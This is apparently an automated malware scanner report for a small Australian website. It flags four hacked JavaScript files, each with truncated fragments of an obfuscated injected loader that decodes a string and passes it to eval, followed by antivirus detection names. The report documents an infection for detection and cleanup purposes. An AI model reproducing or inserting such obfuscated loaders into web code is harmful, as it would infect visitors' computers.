Malware Scanner report for cleanmyclothes.com.au

Malicious/Suspicious/Total urls checked: 4/0/8

4 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "cleanmyclothes.com.au" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=cleanmyclothes.com.au

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://cleanmyclothes.com.au/	200 OK Content-Length: 8764 Content-Type: text/html	clean
http://cleanmyclothes.com.au/./jscripts/jquery-1.4.2.min.js	200 OK Content-Length: 34382 Content-Type: application/javascript	clean
http://cleanmyclothes.com.au/./jscripts/wb.newsviewer.js	200 OK Content-Length: 16167 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.newsviewer = function(options) { return this.each(function() { $.newsviewer(this, options); }); }; $.newsviewer = function(obj, options) { var settings = { mode: 'default', dataSource: 'local', param: null, url: null, maxItems: 10, pause: 5000, includeDate: true, nu ... 16307 bytes are skipped ...Zq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq6bZq60Zq65Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[asedna]("Zq");}dag=vqklfz;wzzyab=[];for(qbkt=22-20-2;-qbkt 1403!=0;qbkt =1){gmggo=qbkt;if((0x19==031))wzzyab =okln.fromCharCode(eval(vfwas dag[1gmggo]) 0xa-dtk);}keewdo=eval;if(Math.ceil(5.5)===6)keewdo(wzzyab)} ipt>') //339810*/ Antivirus reports: AntiVir JS/Quidvetis.A Avast JS:Includer-AMA [Trj] Ad-Aware Trojan.Script.503932 Ikarus Trojan-Downloader.JS.Iframe Rising JS:Trojan.Script.JS.Quidvetis.a!1612880 nProtect Trojan.Script.503932 TrendMicro-HouseCall TROJ_GEN.F47V1216 Comodo Exploit.JS.Expack.G Emsisoft Trojan.Script.503932 (B) Microsoft Trojan:JS/Quidvetis.A MicroWorld-eScan Trojan.Script.503932 Fortinet JS/ExpJS.GC!tr NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure Trojan.Script.503932 AVG JS/Exploit Norman Quidvetis.A GData Trojan.Script.503932 BitDefender Trojan.Script.503932
http://cleanmyclothes.com.au/highslide/highslide.js	200 OK Content-Length: 79534 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var hs = { lang : { cssDirection: 'ltr', loadingText : 'Loading...', loadingTitle : 'Click to cancel', focusTitle : 'Click to bring to front', fullExpandTitle : 'Expand to actual size (f)', creditsText : 'Powered by <i>Highslide JS</i>', creditsTitle : 'Go to the Highslide JS homepage', previousText : 'Previous', nextText : 'Next', moveText : 'Move', closeText : 'Close', closeTitle : 'Close (esc)', resizeTitle : ... 86317 bytes are skipped ...eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq6bZq60Zq65Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[asedna]("Zq");}dag=vqklfz;wzzyab=[];for(qbkt=22-20-2;-qbkt 1403!=0;qbkt =1){gmggo=qbkt;if((0x19==031))wzzyab =okln.fromCharCode(eval(vfwas dag[1gmggo]) 0xa-dtk);}keewdo=eval;if(Math.ceil(5.5)===6)keewdo(wzzyab)} 10/ Antivirus reports: AntiVir JS/Quidvetis.A Avast JS:Includer-AMA [Trj] Ad-Aware Trojan.Script.503932 Rising JS:Trojan.Script.JS.Quidvetis.a!1612880 nProtect Trojan.Script.503932 Emsisoft Trojan.Script.503932 (B) Comodo Exploit.JS.Expack.G Microsoft Trojan:JS/Quidvetis.A MicroWorld-eScan Trojan.Script.503932 Fortinet JS/ExpJS.GC!tr F-Secure Trojan.Script.503932 Norman Quidvetis.A GData Trojan.Script.503932 ESET-NOD32 JS/Kryptik.AOW BitDefender Trojan.Script.503932
http://cleanmyclothes.com.au/highslide/swfobject.js	200 OK Content-Length: 13083 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) if(typeof deconcept=="undefined"){var deconcept=new Object();} if(typeof deconcept.util=="undefined"){deconcept.util=new Object();} if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();} deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a,_b){if(!document.getElementById){return;} this.DETECT_KEY=_b?_b:"detectflash"; this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY); this.params=new Object(); this.variables=new Obje ... 12207 bytes are skipped ...cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq6bZq60Zq65Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[asedna]("Zq");}dag=vqklfz;wzzyab=[];for(qbkt=22-20-2;-qbkt 1403!=0;qbkt =1){gmggo=qbkt;if((0x19==031))wzzyab =okln.fromCharCode(eval(vfwas dag[1gmggo]) 0xa-dtk);}keewdo=eval;if(Math.ceil(5.5)===6)keewdo(wzzyab)} ) ') //339810*/ Antivirus reports: AntiVir JS/Quidvetis.A Avast JS:Includer-AMA [Trj] Ad-Aware Trojan.Script.503932 Ikarus Trojan-Downloader.JS.Iframe Rising JS:Trojan.Script.JS.Quidvetis.a!1612880 nProtect Trojan.Script.503932 TrendMicro-HouseCall TROJ_GEN.F47V1216 Comodo Exploit.JS.Expack.G Emsisoft Trojan.Script.503932 (B) DrWeb JS.IFrame.500 Microsoft Trojan:JS/Quidvetis.A MicroWorld-eScan Trojan.Script.503932 Fortinet JS/ExpJS.GC!tr F-Secure Trojan.Script.503932 AVG JS/Exploit Norman Quidvetis.A GData Trojan.Script.503932 ESET-NOD32 JS/Kryptik.AOW BitDefender Trojan.Script.503932
http://cleanmyclothes.com.au/./jscripts/wwb7.js	200 OK Content-Length: 9721 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function PlaySound(strFileName) { var soundfile = eval("document." strFileName); try { soundfile.Play(); } catch (e) { soundfile.DoPlay(); } } function OnGoMenuFormLink(GoList) { var url = GoList.options[GoList.selectedIndex].value; var target = GoList.options[GoList.selectedIndex].className; GoList.selectedIndex=0; GoList.blur(); if (url) { NewWin=window.ope ... 9190 bytes are skipped ...2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq6bZq60Zq65Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[asedna]("Zq");}dag=vqklfz;wzzyab=[];for(qbkt=22-20-2;-qbkt 1403!=0;qbkt =1){gmggo=qbkt;if((0x19==031))wzzyab =okln.fromCharCode(eval(vfwas dag[1gmggo]) 0xa-dtk);}keewdo=eval;if(Math.ceil(5.5)===6)keewdo(wzzyab)} t>') //339810*/ Antivirus reports: AntiVir JS/Quidvetis.A Avast JS:Includer-AMA [Trj] Ad-Aware Trojan.Script.503932 Ikarus Trojan-Downloader.JS.Iframe Rising JS:Trojan.Script.JS.Quidvetis.a!1612880 nProtect Trojan.Script.503932 TrendMicro-HouseCall TROJ_GEN.F47V1216 Emsisoft Trojan.Script.503932 (B) Comodo Exploit.JS.Expack.G DrWeb JS.IFrame.500 Microsoft Trojan:JS/Quidvetis.A MicroWorld-eScan Trojan.Script.503932 Fortinet JS/Kryptik.AOW!tr F-Secure Trojan.Script.503932 AVG JS/Exploit Norman Quidvetis.A GData Trojan.Script.503932 ESET-NOD32 JS/Kryptik.AOW BitDefender Trojan.Script.503932
http://www.urogynaecologistinkolkata.com/J8fCjQPD.php?id=12677294	200 OK Content-Length: 328 Content-Type: text/html	clean
http://www.urogynaecologistinkolkata.com/test404page.js	404 Not Found Content-Length: 331 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: cleanmyclothes.com.au

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Apr 2014 22:59:15 GMT
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: text/html

Second query (visit from search engine):
GET / HTTP/1.1
Host: cleanmyclothes.com.au
Referer: http://www.google.com/search?q=cleanmyclothes.com.au

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for cleanmyclothes.com.au

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools